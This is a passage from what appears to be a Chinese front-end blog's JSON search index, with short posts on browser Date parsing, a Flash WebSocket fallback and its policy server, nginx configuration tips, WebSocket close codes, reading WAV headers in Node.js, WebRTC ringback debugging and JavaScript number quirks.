string的格式都不一样。\n你最好不要去先入为主,认为浏览器会支持你的格式。\n常见的格式 2010-10-10 19:00:00 就这种格式,在IE11上是不接受的。\n下面的比较,在IE11上返回false, 在chrome上返回true。原因就在于,IE11不支持这种格式。\nnew Date() \u0026gt; new Date(\u0026#39;2010-10-10 19:00:00\u0026#39;) 所以在时间处理上,最好选用比较靠谱的第三方库,例如dayjs, moment等等。\n千万不要先入为主!!\n","permalink":"https://wdd.js.org/fe/trap-of-new-date/","summary":"一般情况下,建议你不要用new Date(\u0026ldquo;time string\u0026rdquo;)的方式去做时间解析。因为不同浏览器,可能接受的time string的格式都不一样。\n你最好不要去先入为主,认为浏览器会支持你的格式。\n常见的格式 2010-10-10 19:00:00 就这种格式,在IE11上是不接受的。\n下面的比较,在IE11上返回false, 在chrome上返回true。原因就在于,IE11不支持这种格式。\nnew Date() \u0026gt; new Date(\u0026#39;2010-10-10 19:00:00\u0026#39;) 所以在时间处理上,最好选用比较靠谱的第三方库,例如dayjs, moment等等。\n千万不要先入为主!!","title":"new Date('time string')的陷阱"},{"content":"IE8/9原生是不支持WebSocket的,但是我们可以使用flash去模拟一个WebSocket接口出来。\n这方面,https://github.com/gimite/web-socket-js 已经可以使用。\n除了客户端之外,服务端需要做个flash安全策略设置。\n这里的服务端是指WebSocket服务器所在的服务端。默认端口是843端口。\n客户端使用flash模拟WebSocket时,会打开一个到服务端843端口的TCP链接。\n并且发送数据:\n\u0026lt;policy-file-request\u0026gt;. 
服务端需要回应下面类似的内容\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE cross-domain-policy SYSTEM \u0026#34;/xml/dtds/cross-domain-policy.dtd\u0026#34;\u0026gt; \u0026lt;cross-domain-policy\u0026gt; \u0026lt;site-control permitted-cross-domain-policies=\u0026#34;all\u0026#34;/\u0026gt; \u0026lt;allow-access-from domain=\u0026#34;*\u0026#34; to-ports=\u0026#34;*\u0026#34; secure=\u0026#34;false\u0026#34;/\u0026gt; \u0026lt;allow-http-request-headers-from domain=\u0026#34;*\u0026#34; headers=\u0026#34;*\u0026#34;/\u0026gt; \u0026lt;/cross-domain-policy\u0026gt; Node.js实现 policy.js module.exports.policyFile = `\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE cross-domain-policy SYSTEM \u0026#34;/xml/dtds/cross-domain-policy.dtd\u0026#34;\u0026gt; \u0026lt;cross-domain-policy\u0026gt; \u0026lt;site-control permitted-cross-domain-policies=\u0026#34;all\u0026#34;/\u0026gt; \u0026lt;allow-access-from domain=\u0026#34;*\u0026#34; to-ports=\u0026#34;*\u0026#34; secure=\u0026#34;false\u0026#34;/\u0026gt; \u0026lt;allow-http-request-headers-from domain=\u0026#34;*\u0026#34; headers=\u0026#34;*\u0026#34;/\u0026gt; \u0026lt;/cross-domain-policy\u0026gt;` index.js const Net = require(\u0026#39;net\u0026#39;) const {policyFile} = require(\u0026#39;./policy\u0026#39;) const port = 843 console.log(policyFile) const server = new Net.Server() server.listen(port, function() { console.log(`Server listening for connection requests on socket localhost:${port}`); }); server.on(\u0026#39;connection\u0026#39;, function(socket) { console.log(\u0026#39;A new connection has been established.\u0026#39;); socket.end(policyFile) socket.on(\u0026#39;data\u0026#39;, function(chunk) { console.log(`Data received from client: ${chunk.toString()}`); }); socket.on(\u0026#39;end\u0026#39;, function() { console.log(\u0026#39;Closing connection with the client\u0026#39;); }); socket.on(\u0026#39;error\u0026#39;, function(err) { console.log(`Error: ${err}`); }); 
}); ","permalink":"https://wdd.js.org/fe/ie89-websocket-flash/","summary":"IE8/9原生是不支持WebSocket的,但是我们可以使用flash去模拟一个WebSocket接口出来。\n这方面,https://github.com/gimite/web-socket-js 已经可以使用。\n除了客户端之外,服务端需要做个flash安全策略设置。\n这里的服务端是指WebSocket服务器所在的服务端。默认端口是843端口。\n客户端使用flash模拟WebSocket时,会打开一个到服务端843端口的TCP链接。\n并且发送数据:\n\u0026lt;policy-file-request\u0026gt;. 服务端需要回应下面类似的内容\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE cross-domain-policy SYSTEM \u0026#34;/xml/dtds/cross-domain-policy.dtd\u0026#34;\u0026gt; \u0026lt;cross-domain-policy\u0026gt; \u0026lt;site-control permitted-cross-domain-policies=\u0026#34;all\u0026#34;/\u0026gt; \u0026lt;allow-access-from domain=\u0026#34;*\u0026#34; to-ports=\u0026#34;*\u0026#34; secure=\u0026#34;false\u0026#34;/\u0026gt; \u0026lt;allow-http-request-headers-from domain=\u0026#34;*\u0026#34; headers=\u0026#34;*\u0026#34;/\u0026gt; \u0026lt;/cross-domain-policy\u0026gt; Node.js实现 policy.js module.exports.policyFile = `\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE cross-domain-policy SYSTEM \u0026#34;/xml/dtds/cross-domain-policy.dtd\u0026#34;\u0026gt; \u0026lt;cross-domain-policy\u0026gt; \u0026lt;site-control permitted-cross-domain-policies=\u0026#34;all\u0026#34;/\u0026gt; \u0026lt;allow-access-from domain=\u0026#34;*\u0026#34; to-ports=\u0026#34;*\u0026#34; secure=\u0026#34;false\u0026#34;/\u0026gt; \u0026lt;allow-http-request-headers-from domain=\u0026#34;*\u0026#34; headers=\u0026#34;*\u0026#34;/\u0026gt; \u0026lt;/cross-domain-policy\u0026gt;` index.js const Net = require(\u0026#39;net\u0026#39;) const {policyFile} = require(\u0026#39;./policy\u0026#39;) const port = 843 console.log(policyFile) const server = new Net.Server() server.listen(port, function() { console.log(`Server listening for connection requests on socket localhost:${port}`); }); server.","title":"IE8/9 
支持WebSocket方案,flash安全策略"},{"content":"电脑的风扇声突然响了起来,我知道有某个进程在占用大量CPU资源。\n在任务管理器中,可以看到vscode占用的CPU资源达到150%。说明问题出在vscode上。\n在vscode中,按F1, 输入: show running extensions 可以查看所有插件的运行状况。\n其中需要关注最重要的指标就是活动时间:如果某个插件的活动时间明显是其他插件的好多倍,那问题就可能出在这个插件上。要么禁用该插件,要么卸载该插件。\n","permalink":"https://wdd.js.org/fe/vscode-high-cpu/","summary":"电脑的风扇声突然响了起来,我知道有某个进程在占用大量CPU资源。\n在任务管理器中,可以看到vscode占用的CPU资源达到150%。说明问题出在vscode上。\n在vscode中,按F1, 输入: show running extensions 可以查看所有插件的运行状况。\n其中需要关注最重要的指标就是活动时间:如果某个插件的活动时间明显是其他插件的好多倍,那问题就可能出在这个插件上。要么禁用该插件,要么卸载该插件。","title":"为什么vscode会占用大量CPU资源?"},{"content":"js原生支持16进制、10进制、8进制的直接定义\nvar a = 21 // 十进制 var b = 0xee // 十六进制, 238 var c = 013 // 八进制 11 十进制转二进制字符串 var a = 21 // 十进制 a.toString(2) // \u0026#34;10101\u0026#34; 二进制转10进制 var d = \u0026#34;10101\u0026#34; parseInt(\u0026#39;10101\u0026#39;,2) // 21 ","permalink":"https://wdd.js.org/fe/bin-number-operator/","summary":"js原生支持16进制、10进制、8进制的直接定义\nvar a = 21 // 十进制 var b = 0xee // 十六进制, 238 var c = 013 // 八进制 11 十进制转二进制字符串 var a = 21 // 十进制 a.toString(2) // \u0026#34;10101\u0026#34; 二进制转10进制 var d = \u0026#34;10101\u0026#34; parseInt(\u0026#39;10101\u0026#39;,2) // 21 ","title":"js中二进制的操作"},{"content":"const fs = require(\u0026#39;fs\u0026#39;) var request = 
require(\u0026#39;request\u0026#39;) const zlib = require(\u0026#39;zlib\u0026#39;) const log = require(\u0026#39;./log.js\u0026#39;) const fileType = \u0026#39;\u0026#39; let endCount = 0 module.exports = (item) =\u0026gt; { return new Promise((resolve, reject) =\u0026gt; { request.get(item.url) .on(\u0026#39;error\u0026#39;, (error) =\u0026gt; { log.error(`下载失败${item.name}`) reject(error) }) .pipe(zlib.createGunzip()) .pipe(fs.createWriteStream(item.name + fileType)) .on(\u0026#39;finish\u0026#39;, (res) =\u0026gt; { log.info(`${++endCount} 完成下载 ${item.name + fileType}`) resolve(res) }) }) } ","title":"NodeJS边下载边解压gz文件"},{"content":"下面的命令可以生成一个v8的日志如 isolate-0x102d4e000-86008-v8.log\n--log-source-code 不是必传的字段,加了该字段可以定位到源码 node --prof --log-source-code index.js 下一步是将log文件转成json\nnode --prof-process --preprocess isolate-0x102d4e000-86008-v8.log \u0026gt; v8.json 然后打开 https://wangduanduan.gitee.io/v8-profiling/ 这个页面,选择v8.json\n下图横坐标是时间,纵坐标是cpu百分比。\n选择Bottom Up之后,展开JS unoptimized, 可以发现占用cpu比较高的代码的位置。\n","permalink":"https://wdd.js.org/fe/v8-profile/","summary":"下面的命令可以生成一个v8的日志如 isolate-0x102d4e000-86008-v8.log\n--log-source-code 不是必传的字段,加了该字段可以定位到源码 node --prof --log-source-code index.js 下一步是将log文件转成json\nnode --prof-process --preprocess isolate-0x102d4e000-86008-v8.log \u0026gt; v8.json 然后打开 https://wangduanduan.gitee.io/v8-profiling/ 这个页面,选择v8.json\n下图横坐标是时间,纵坐标是cpu百分比。\n选择Bottom Up之后,展开JS unoptimized, 可以发现占用cpu比较高的代码的位置。","title":"V8 Profile"},{"content":"1. 启动?停止?reload配置 nginx -s reload # 热重启 nginx -s reopen # 重启Nginx nginx -s stop # 快速关闭 nginx -s quit # 等待工作进程处理完成后关闭 nginx -T # 查看配置文件的实际内容 2. nginx如何做反向http代理 location ^~ /api { proxy_pass http://192.168.40.174:32020; } 3. 
nginx要如何配置才能处理跨域问题 location ^~ /p/asm { proxy_pass http://192.168.40.174:32020; add_header \u0026#39;Access-Control-Allow-Origin\u0026#39; \u0026#39;*\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Credentials\u0026#39; \u0026#39;true\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Methods\u0026#39; \u0026#39;GET,POST,PUT,DELETE,PATCH,OPTIONS\u0026#39;; add_header \u0026#39;Access-Control-Allow-Headers\u0026#39; \u0026#39;Content-Type,ssid\u0026#39;; if ($request_method = \u0026#39;OPTIONS\u0026#39;) {return 204;} proxy_redirect off; proxy_set_header Host $host; } 4. 如何拦截某个请求,直接返回某个状态码? location ^~ /p/asm { return 204 \u0026#34;OK\u0026#34;; } 5. 如何给某个路径的请求设置独立的日志文件? location ^~ /p/asm { access_log /var/log/nginx/a.log; error_log /var/log/nginx/a.err.log; } 6. 如何设置nginx的静态文件服务器 location / { add_header Cache-Control max-age=360000; root /usr/share/nginx/html/webrtc-sdk/dist/; } # 如果目标地址中没有video, video只是用来识别路径的,则需要使用 # rewrite指令去去除video路径 # 否则访问/video 就会转到 /home/resources/video 路径 location /video { rewrite /video/(.*) /$1 break; add_header Cache-Control max-age=360000; autoindex on; root /home/resources/; } 7. 反向代理时,如何做路径重写? 使用 rewrite 指令,例如 rewrite /p/(.*) /$1 break; 8. Nginx如何配置才能做websocket代理? location ^~ /websocket { proxy_pass http://192.168.40.174:31089; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection \u0026#34;Upgrade\u0026#34;; } 9. 如何调整nginx的最大打开文件限制 设置worker_rlimit_nofile\nuser root root; worker_processes 4; worker_rlimit_nofile 65535; 10. 如何判断worker_rlimit_nofile是否生效? 11. 直接返回文本 location / { default_type text/plain; return 502 \u0026#34;服务正在升级,请稍后再试……\u0026#34;; } location / { default_type text/html; return 502 \u0026#34;服务正在升级,请稍后再试……\u0026#34;; } location / { default_type application/json; return 502 \u0026#39;{\u0026#34;status\u0026#34;:502,\u0026#34;msg\u0026#34;:\u0026#34;服务正在升级,请稍后再试……\u0026#34;}\u0026#39;; } 13. 
多种日志格式 例如,不同的反向代理,使用不同的日志格式。\n例如下面,定义了三种日志格式main, main2, main3。\n在access_log 指令的路径之后,指定日志格式就可以了。\nhttp { log_format main \u0026#39;$time_iso8601 $remote_addr $status $request\u0026#39;; log_format main2 \u0026#39;$remote_addr $status $request\u0026#39;; log_format main3 \u0026#39;$status $request\u0026#39;; access_log /var/log/nginx/access.log main; 14. 权限问题 例如某些端口无法监听,则需要检查是否被selinux给拦截了。 或者nginx的启动用户不是root用户导致无法访问某些root用户的目录。\n参考 https://mp.weixin.qq.com/s/JUOyAe1oEs-WwmEmsHRn8w https://www.nginx.com/blog/tcp-load-balancing-udp-load-balancing-nginx-tips-tricks/ https://www.cnblogs.com/freeweb/p/5944894.html ","permalink":"https://wdd.js.org/fe/nginx-tips/","summary":"1. 启动?停止?reload配置 nginx -s reload # 热重启 nginx -s reopen # 重启Nginx nginx -s stop # 快速关闭 nginx -s quit # 等待工作进程处理完成后关闭 nginx -T # 查看配置文件的实际内容 2. nginx如何做反向http代理 location ^~ /api { proxy_pass http://192.168.40.174:32020; } 3. nginx要如何配置才能处理跨域问题 location ^~ /p/asm { proxy_pass http://192.168.40.174:32020; add_header \u0026#39;Access-Control-Allow-Origin\u0026#39; \u0026#39;*\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Credentials\u0026#39; \u0026#39;true\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Methods\u0026#39; \u0026#39;GET,POST,PUT,DELETE,PATCH,OPTIONS\u0026#39;; add_header \u0026#39;Access-Control-Allow-Headers\u0026#39; \u0026#39;Content-Type,ssid\u0026#39;; if ($request_method = \u0026#39;OPTIONS\u0026#39;) {return 204;} proxy_redirect off; proxy_set_header Host $host; } 4. 如何拦截某个请求,直接返回某个状态码? location ^~ /p/asm { return 204 \u0026#34;OK\u0026#34;; } 5.","title":"前端必会的nginx知识点"},{"content":"WebSocket断开码,一般用到的是从1000-1015。\n正常的断开码是1000。其他的都是异常断开。\n场景 服务端断开码 备注 刷新浏览器页面 1001 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 关闭浏览器tab页面 1001 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 关闭浏览器, 所有标签页都会关闭。 1001 可以发现。无论是刷新,关闭tab页面还是关闭浏览器,错误码都是1001 ws.close() 1005 主动调用close, 不传递错误码。对服务端来说,也是异常断开。1005表示没有收到预期的状态码. 
ws.close(1000) 1000 正常的关闭,客户端必须传递正确的错误原因码。原因码不是随便填入的。比如 ws.close(1009) 会报错:Failed to execute \u0026lsquo;close\u0026rsquo; on \u0026lsquo;WebSocket\u0026rsquo;: The code must be either 1000, or between 3000 and 4999. 1009 is neither. 客户端断网 ","permalink":"https://wdd.js.org/fe/websocket-disconnect-test/","summary":"WebSocket断开码,一般用到的是从1000-1015。\n正常的断开码是1000。其他的都是异常断开。\n场景 服务端断开码 备注 刷新浏览器页面 1001 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 关闭浏览器tab页面 1001 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 关闭浏览器, 所有标签页都会关闭。 1001 可以发现。无论是刷新,关闭tab页面还是关闭浏览器,错误码都是1001 ws.close() 1005 主动调用close, 不传递错误码。对服务端来说,也是异常断开。1005表示没有收到预期的状态码. ws.close(1000) 1000 正常的关闭,客户端必须传递正确的错误原因码。原因码不是随便填入的。比如 ws.close(1009) 会报错:Failed to execute \u0026lsquo;close\u0026rsquo; on \u0026lsquo;WebSocket\u0026rsquo;: The code must be either 1000, or between 3000 and 4999. 1009 is neither. 客户端断网 ","title":"WebSocket断开码测试"},{"content":"相比于普通的文件,二进制的文件略显神秘。本次就为大家揭开二进制文件的面纱。\nWAV文件的格式 下图是一个普通的wav文件的格式。其中除了最后的data部分,其他的每个格子都占用了固定大小的字节数。\n知道字节数之后,就需要按照正确的字节序读取。字节序读反了,可能读出一堆乱码。 关于字节序,可以参考阮一峰老师写的理解字节序这篇文章。\nstep1: 读取文件 const fs = require(\u0026#39;fs\u0026#39;) const path = require(\u0026#39;path\u0026#39;) const file = fs.readFileSync(path.join(__dirname, \u0026#39;./a.wav\u0026#39;)) console.log(file) 原始的打印,二进制以16进制的方式显示。看不出其中有何含义。\nnode main.js \u0026lt;Buffer 52 49 46 46 a4 23 48 00 57 41 56 45 66 6d 74 20 10 00 00 00 01 00 02 00 40 1f 00 00 00 7d 00 00 04 00 10 00 64 61 74 61 80 23 48 00 00 00 00 00 00 00 ... 4727674 more bytes\u0026gt; step2: 工具函数 // 将buf转为字符串 function buffer2String (buf) { let int = [] for (let i=0; i\u0026lt;buf.length; i++) { int.push(buf.readUInt8(i)) } return String.fromCharCode(...int) } // 对读取的头字段的值进行校验 // 实际上头字段之间是存在一定的关系的 function validWav (wav, fileSize) { //20 2 AudioFormat PCM = 1 (i.e. Linear quantization) // Values other than 1 indicate some // form of compression. // 22 2 NumChannels Mono = 1, Stereo = 2, etc. // 24 4 SampleRate 8000, 44100, etc. 
// 28 4 ByteRate == SampleRate * NumChannels * BitsPerSample/8 // 32 2 BlockAlign == NumChannels * BitsPerSample/8 // The number of bytes for one sample including // all channels. I wonder what happens when // this number isn\u0026#39;t an integer? // 34 2 BitsPerSample 8 bits = 8, 16 bits = 16, etc. if (wav.AudioFormat !== 1) { return 1 } if (![1,2].includes(wav.NumChannels)){ return 2 } if (![8000,44100].includes(wav.SampleRate)){ return 3 } if (![8,16].includes(wav.BitsPerSample)){ return 4 } if (wav.ByteRate !== wav.SampleRate * wav.NumChannels * wav.BitsPerSample / 8){ return 5 } if (wav.BlockAlign !== wav.NumChannels * wav.BitsPerSample / 8 ){ return 6 } if (wav.ChunkSize + 8 !== fileSize) { return 7 } return 0 } class ByteWalk { constructor(buf){ // 记录当前读过的字节数 this.current = 0 // 记录整个buf this.buf = buf } // 用来指定要读取的字节数,以及它的格式 step(s, f){ if (this.current === this.buf.length) { return } let bf if (arguments.length === 0) { s = this.buf.length - this.current } if (this.current + s \u0026gt;= this.buf.length) { bf = this.buf.slice(this.current, this.buf.length) this.current = this.buf.length } else { bf = this.buf.slice(this.current, this.current + s) this.current += s } // 一个特殊的标记,用来标记按照字符串的方式读取buf if (f === \u0026#39;readStringBE\u0026#39;) { return buffer2String(bf) } if (!f) { return bf } return bf[f](); } } function readData (buf, step, read) { let data = [] for (let i=0; i\u0026lt;buf.length; i += step) { data.push(buf[read](i)) } return data } module.exports = { buffer2String, // validFile, ByteWalk, validWav, readData } step3: main函数 const fs = require(\u0026#39;fs\u0026#39;) const path = require(\u0026#39;path\u0026#39;) const { ByteWalk, validWav, readData } = require(\u0026#39;./util\u0026#39;) const file = fs.readFileSync(path.join(__dirname, \u0026#39;./a.wav\u0026#39;)) const B = new ByteWalk(file) // 按照固定的字节数读取 let friendData = { ChunkID: B.step(4,\u0026#39;readStringBE\u0026#39;), ChunkSize: B.step(4, \u0026#39;readUInt32LE\u0026#39;), Format: 
B.step(4, \u0026#39;readStringBE\u0026#39;), Subchunk1ID: B.step(4, \u0026#39;readStringBE\u0026#39;), Subchunk1Size: B.step(4, \u0026#39;readUInt32LE\u0026#39;), AudioFormat: B.step(2, \u0026#39;readUInt16LE\u0026#39;), NumChannels: B.step(2, \u0026#39;readUInt16LE\u0026#39;), SampleRate: B.step(4, \u0026#39;readUInt32LE\u0026#39;), ByteRate: B.step(4, \u0026#39;readUInt32LE\u0026#39;), BlockAlign: B.step(2, \u0026#39;readUInt16LE\u0026#39;), BitsPerSample: B.step(2, \u0026#39;readUInt16LE\u0026#39;), Subchunk2ID: B.step(4, \u0026#39;readStringBE\u0026#39;), Subchunk2Size: B.step(4, \u0026#39;readUInt32LE\u0026#39;), Data: B.step() } // var data = readData(friendData.Data, friendData.BlockAlign, \u0026#39;readInt16LE\u0026#39;) console.log(validWav(friendData, file.length)) console.log(friendData, friendData.Data.length) // console.log(data) 从输出的内容可以看到,各个头字段基本上都读取出来了。\n0 { ChunkID: \u0026#39;RIFF\u0026#39;, ChunkSize: 4727716, Format: \u0026#39;WAVE\u0026#39;, Subchunk1ID: \u0026#39;fmt \u0026#39;, Subchunk1Size: 16, AudioFormat: 1, NumChannels: 2, SampleRate: 8000, ByteRate: 32000, BlockAlign: 4, BitsPerSample: 16, Subchunk2ID: \u0026#39;data\u0026#39;, Subchunk2Size: 4727680, Data: \u0026lt;Buffer 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ... 
4727630 more bytes\u0026gt; } 4727680 想要深入理解wav文件格式的,可以看下最后的参考资料。\n之后大家可以做一些有趣的事情,例如双声道的声音做声道分离,或者说双声道合并成单声道等等。\n参考资料 http://soundfile.sapp.org/doc/WaveFormat/ ","permalink":"https://wdd.js.org/fe/nodejs-read-wav-file/","summary":"相比于普通的文件,二进制的文件略显神秘。本次就为大家揭开二进制文件的面纱。\nWAV文件的格式 下图是一个普通的wav文件的格式。其中除了最后的data部分,其他的每个格子都占用了固定大小的字节数。\n知道字节数之后,就需要按照正确的字节序读取。字节序读反了,可能读出一堆乱码。 关于字节序,可以参考阮一峰老师写的理解字节序这篇文章。\nstep1: 读取文件 const fs = require(\u0026#39;fs\u0026#39;) const path = require(\u0026#39;path\u0026#39;) const file = fs.readFileSync(path.join(__dirname, \u0026#39;./a.wav\u0026#39;)) console.log(file) 原始的打印,二进制以16进制的方式显示。看不出其中有何含义。\nnode main.js \u0026lt;Buffer 52 49 46 46 a4 23 48 00 57 41 56 45 66 6d 74 20 10 00 00 00 01 00 02 00 40 1f 00 00 00 7d 00 00 04 00 10 00 64 61 74 61 80 23 48 00 00 00 00 00 00 00 .","title":"Node.js读取wav文件"},{"content":"什么是回铃音? 
回铃音的特点\n回铃音是由运营商送给手机的,而不是由被叫送给主叫的。 回铃音的播放阶段是在被叫接听前播放,被叫一旦接听,回铃音则播放结束 回铃音一般是450Hz, 嘟一秒,停4秒,5秒一个周期 回铃音分为三种\n舒适噪音阶段:就是嘟一秒,停4秒的阶段 彩铃阶段:有的手机,在接听之前,会向主叫方播放个性化的语音,例如放点流行音乐之类的 定制回音阶段:例如被叫方立即把电话给拒绝了,但是主叫方这边并没有挂电话,而是在播放:对不起,您拨打的电话无人接听,请稍后再拨 问题现象 WebRTC拨打出去之后,在客户接听之前,听不到任何回铃音。在客户接听之后,可以短暂的听到一点点回铃音。 问题排查思路 服务端问题 客户端问题 网络问题 网络架构 首先根据网络架构图,我决定在a点和b点进行抓包 抓包之后用wireshark进行分析。得出以下结论\nsip服务器AB之间用的是g711编码,语音流没有加密。从b点抓的包,能够从中提取出SIP服务器B向sip服务器A发送的语音流,可以听到回铃音。说明SIP服务器A是收到了回铃音的。 ab两点之间的WebRTC语音流是加密的,无法分析出其中是否含有语音流。 虽然无法提取出WebRTC语音流。但是通过wireshark Statistics -\u0026gt; Conversation 分析,得出结论:在电话接通之前,a点收到的udp包和从b点发出的udp包的数量是一致的。说明webrtc客户端实际上是收到了语音流。只不过客户端没有播放。然后问题定位到客户端的js库。 通过分析客户端库的代码,定位到具体代码的位置。解决问题,并向开源库提交了修复bug的pull request。实际上只是修改了一行代码。https://github.com/versatica/JsSIP/pull/669 问题总结 解决问题看似很简单,但是需要很强的问题分析能力,并且对网络协议,网络架构,wireshark抓包分析都要精通,才能真正的看到深层次的东西。\n","permalink":"https://wdd.js.org/fe/webrtc-has-no-earlymedia/","summary":"什么是回铃音? 回铃音的特点\n回铃音是由运营商送给手机的,而不是由被叫送给主叫的。 回铃音的播放阶段是在被叫接听前播放,被叫一旦接听,回铃音则播放结束 回铃音一般是450Hz, 嘟一秒,停4秒,5秒一个周期 回铃音分为三种\n舒适噪音阶段:就是嘟一秒,停4秒的阶段 彩铃阶段:有的手机,在接听之前,会向主叫方播放个性化的语音,例如放点流行音乐之类的 定制回音阶段:例如被叫方立即把电话给拒绝了,但是主叫方这边并没有挂电话,而是在播放:对不起,您拨打的电话无人接听,请稍后再拨 问题现象 WebRTC拨打出去之后,在客户接听之前,听不到任何回铃音。在客户接听之后,可以短暂的听到一点点回铃音。 问题排查思路 服务端问题 客户端问题 网络问题 网络架构 首先根据网络架构图,我决定在a点和b点进行抓包 抓包之后用wireshark进行分析。得出以下结论\nsip服务器AB之间用的是g711编码,语音流没有加密。从b点抓的包,能够从中提取出SIP服务器B向sip服务器A发送的语音流,可以听到回铃音。说明SIP服务器A是收到了回铃音的。 ab两点之间的WebRTC语音流是加密的,无法分析出其中是否含有语音流。 虽然无法提取出WebRTC语音流。但是通过wireshark Statistics -\u0026gt; Conversation 分析,得出结论:在电话接通之前,a点收到的udp包和从b点发出的udp包的数量是一致的。说明webrtc客户端实际上是收到了语音流。只不过客户端没有播放。然后问题定位到客户端的js库。 通过分析客户端库的代码,定位到具体代码的位置。解决问题,并向开源库提交了修复bug的pull request。实际上只是修改了一行代码。https://github.com/versatica/JsSIP/pull/669 问题总结 解决问题看似很简单,但是需要很强的问题分析能力,并且对网络协议,网络架构,wireshark抓包分析都要精通,才能真正的看到深层次的东西。","title":"记一次WebRTC无回铃音问题排查"},{"content":"在PC端,使用WebRTC通话一般都会使用耳麦,如果耳麦有问题,可能就会报这个错。 所以最好多换几个耳麦,试试。\n","permalink":"https://wdd.js.org/fe/webrtc-domexception/","summary":"在PC端,使用WebRTC通话一般都会使用耳麦,如果耳麦有问题,可能就会报这个错。 所以最好多换几个耳麦,试试。","title":"WebRTC getUserMedia DOMException Requested Device not found"},{"content":"client.onConnect = function (frame) { console.log(\u0026#39;onConnect\u0026#39;, frame) client.subscribe(\u0026#39;/topic/event.agent.*.abc_cc\u0026#39;, function (msg) { console.log(msg) }, { id: \u0026#39;wdd\u0026#39;, \u0026#39;x-queue-name\u0026#39;: \u0026#39;wdd-queue\u0026#39; }) } 在mq管理端:\nOptional Arguments Optional queue arguments, also known as \u0026ldquo;x-arguments\u0026rdquo; because of their field name in the AMQP 0-9-1 protocol, is a map (dictionary) of arbitrary key/value pairs that can be provided by clients when a queue is declared. 
-https://www.rabbitmq.com/queues.html\n","permalink":"https://wdd.js.org/fe/stompjs-set-queue-name/","summary":"client.onConnect = function (frame) { console.log(\u0026#39;onConnect\u0026#39;, frame) client.subscribe(\u0026#39;/topic/event.agent.*.abc_cc\u0026#39;, function (msg) { console.log(msg) }, { id: \u0026#39;wdd\u0026#39;, \u0026#39;x-queue-name\u0026#39;: \u0026#39;wdd-queue\u0026#39; }) } 在mq管理端:\nOptional Arguments Optional queue arguments, also known as \u0026ldquo;x-arguments\u0026rdquo; because of their field name in the AMQP 0-9-1 protocol, is a map (dictionary) of arbitrary key/value pairs that can be provided by clients when a queue is declared. -https://www.rabbitmq.com/queues.html","title":"stompjs 使用x-queue-name指定队列名"},{"content":"最近看了一篇文章,里面提出一个问题?\nparseInt(0.0000005)为什么等于5?\n最终也给出了解释,parseInt的第一个参数,如果不是字符串的话, 将会调用ToString方法,将其转为字符串。\nstring The value to parse. If this argument is not a string, then it is converted to one using the ToString abstract operation. Leading whitespace in this argument is ignored. MDN\n我们在console面板上直接输入0.0000005回车之后发现是5e-7。我们使用toString()方法转换之后发现是字符串5e-7\n字符串5e-7转成整数5是没什么疑问的,问题在于为什么0.0000005转成5e-7。而如果少一个零,就可以看到console会原样输出。\n数值类型如何转字符串? 
对于数值类型,是使用Number.toString()方法转换的。\nNumber.toString(x)的算法分析 这个算法并没有像我们想象的那么简单。\n先说一些简单场景\n简单场景 Number.toString(x) 如果x是NaN, 返回\u0026quot;NaN\u0026quot; 如果x是+0或者-0, 返回\u0026quot;0\u0026quot; 如果x是负数, 返回Number.toString(-x) 如果x是正无穷,返回\u0026quot;Infinity\u0026quot; 复杂场景 可以看出,0.0000005并不在简单场景中。下面就进入到复杂场景了。\n会用到一个公式\nk,s,n都是整数 k大于等于1 10的k-1次方小于等于s, 且s小于等于10的k次方 10的n-k次方属于实数 0.0000005可以表示为5*10的-7次方。代入上面的公式,可以算出: k=1, s=5, n=-6。\n参考 https://dmitripavlutin.com/parseint-mystery-javascript/ https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/parseInt https://tc39.es/ecma262/#sec-numeric-types-number-tostring ","permalink":"https://wdd.js.org/fe/parseint-with-little-number/","summary":"最近看了一篇文章,里面提出一个问题?\nparseInt(0.0000005)为什么等于5?\n最终也给出了解释,parseInt的第一个参数,如果不是字符串的话, 将会调用ToString方法,将其转为字符串。\nstring The value to parse. If this argument is not a string, then it is converted to one using the ToString abstract operation. Leading whitespace in this argument is ignored. MDN\n我们在console面板上直接输入0.0000005回车之后发现是5e-7。我们使用toString()方法转换之后发现是字符串5e-7\n字符串5e-7转成整数5是没什么疑问的,问题在于为什么0.0000005转成5e-7。而如果少一个零,就可以看到console会原样输出。\n数值类型如何转字符串? 
对于数值类型,是使用Number.toString()方法转换的。\nNumber.toString(x)的算法分析 这个算法并没有像我们想象的那么简单。\n先说一些简单场景\n简单场景 Number.toString(x) 如果x是NaN, 返回\u0026quot;NaN\u0026quot; 如果x是+0或者-0, 返回\u0026quot;0\u0026quot; 如果x是负数, 返回Number.toString(-x) 如果x是正无穷,返回\u0026quot;Infinity\u0026quot; 复杂场景 可以看出,0.0000005并不在简单场景中。下面就进入到复杂场景了。\n会用到一个公式\nk,s,n都是整数 k大于等于1 10的k-1次方小于等于s, 且s小于等于10的k次方 10的n-k次方属于实数 0.0000005可以表示为5*10的-7次方。代入上面的公式,可以算出: k=1, s=5, n=-6。\n参考 https://dmitripavlutin.com/parseint-mystery-javascript/ https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/parseInt https://tc39.es/ecma262/#sec-numeric-types-number-tostring ","title":"parseInt(0.0000005)为什么等于5?"},{"content":"let a = {} let b = Object.create({}) let c = Object.create(null) console.log(a,b,c) 上面三个对象的区别是什么?\n","permalink":"https://wdd.js.org/fe/js-object-create/","summary":"let a = {} let b = Object.create({}) let 